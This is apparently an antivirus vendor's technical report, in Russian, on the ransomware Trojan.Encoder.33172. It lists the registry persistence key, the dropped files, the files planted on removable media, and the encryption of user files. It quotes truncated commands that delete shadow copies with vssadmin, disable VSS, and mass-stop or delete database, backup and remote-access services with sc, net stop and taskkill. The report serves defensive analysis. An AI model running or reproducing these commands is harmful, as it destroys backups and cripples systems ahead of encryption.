Trojan.Encoder.33172

Техническая информация

Для обеспечения автозапуска и распространения

Модифицирует следующие ключи реестра

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'WindowsUpdateCheck' = '<Полный путь к файлу>'

Создает или изменяет следующие файлы

%APPDATA%\microsoft\windows\start menu\programs\zxczcxsa\ewfewcxz.exe

Создает следующие файлы на съемном носителе

<Имя диска съемного носителя>:\.c4d1664ef40ce18f8d41
<Имя диска съемного носителя>:\fi51.doc
<Имя диска съемного носителя>:\lisp_success.doc
<Имя диска съемного носителя>:\applicantform_en.doc
<Имя диска съемного носителя>:\508softwareandos.doc
<Имя диска съемного носителя>:\testee.cer
<Имя диска съемного носителя>:\sdksampleprivdeveloper.cer
<Имя диска съемного носителя>:\contosoroot_1.cer
<Имя диска съемного носителя>:\sdkfailsafeemulator.cer
<Имя диска съемного носителя>:\testcertificate.cer
<Имя диска съемного носителя>:\pmd.cer
<Имя диска съемного носителя>:\coffee.bmp
<Имя диска съемного носителя>:\dialmap.bmp
<Имя диска съемного носителя>:\toolbar.bmp
<Имя диска съемного носителя>:\dashborder_192.bmp
<Имя диска съемного носителя>:\dashborder_144.bmp
<Имя диска съемного носителя>:\split.avi
<Имя диска съемного носителя>:\000814251_video_01.avi
<Имя диска съемного носителя>:\uep_form_786_bulletin_1726i602.doc
<Имя диска съемного носителя>:\wrar520.exe

Изменения в файловой системе

Создает следующие файлы

%TEMP%\killer.bat
%TEMP%\kdclogq.vbs
%ALLUSERSPROFILE%\local\.c4d1664ef40ce18f8d41
<Текущая директория>\ids.txt
z:\.c4d1664ef40ce18f8d41
D:\.c4d1664ef40ce18f8d41
D:\$recycle.bin\.c4d1664ef40ce18f8d41
D:\system volume information\.c4d1664ef40ce18f8d41
z:\system volume information\.c4d1664ef40ce18f8d41

Присваивает атрибут 'скрытый' для следующих файлов

%ALLUSERSPROFILE%\local\.c4d1664ef40ce18f8d41
D:\.c4d1664ef40ce18f8d41
<Имя диска съемного носителя>:\.c4d1664ef40ce18f8d41
D:\$recycle.bin\.c4d1664ef40ce18f8d41
z:\.c4d1664ef40ce18f8d41
D:\system volume information\.c4d1664ef40ce18f8d41
z:\system volume information\.c4d1664ef40ce18f8d41

Изменяет множество файлов пользовательских данных (Trojan.Encoder).

Изменяет расширения файлов пользовательских данных (Trojan.Encoder).

Другое

Создает и запускает на исполнение

'%WINDIR%\syswow64\wscript.exe' "%TEMP%\Kdclogq.vbs"
'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\killer.bat" "' (со скрытым окном)

Запускает на исполнение

'%WINDIR%\syswow64\cmd.exe' /c @echo off sc config browser sc config browser start=enabled vssadmin delete shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabl...
'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\killer.bat" "
'%WINDIR%\syswow64\cmd.exe' /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete Qc...
'%WINDIR%\syswow64\cmd.exe' /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc d...
'%WINDIR%\syswow64\cmd.exe' /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc ...
'%WINDIR%\syswow64\cmd.exe' /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusb...
'%WINDIR%\syswow64\cmd.exe' /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDA...
'%WINDIR%\syswow64\cmd.exe' /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop ...
'%WINDIR%\syswow64\cmd.exe' /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Servi...
'%WINDIR%\syswow64\cmd.exe' /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer ...
'%WINDIR%\syswow64\cmd.exe' /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @t...
'%WINDIR%\syswow64\cmd.exe' /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill...
'%WINDIR%\syswow64\cmd.exe' /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_ma...
'%WINDIR%\syswow64\cmd.exe' /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & ...
'%WINDIR%\syswow64\cmd.exe' /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingser...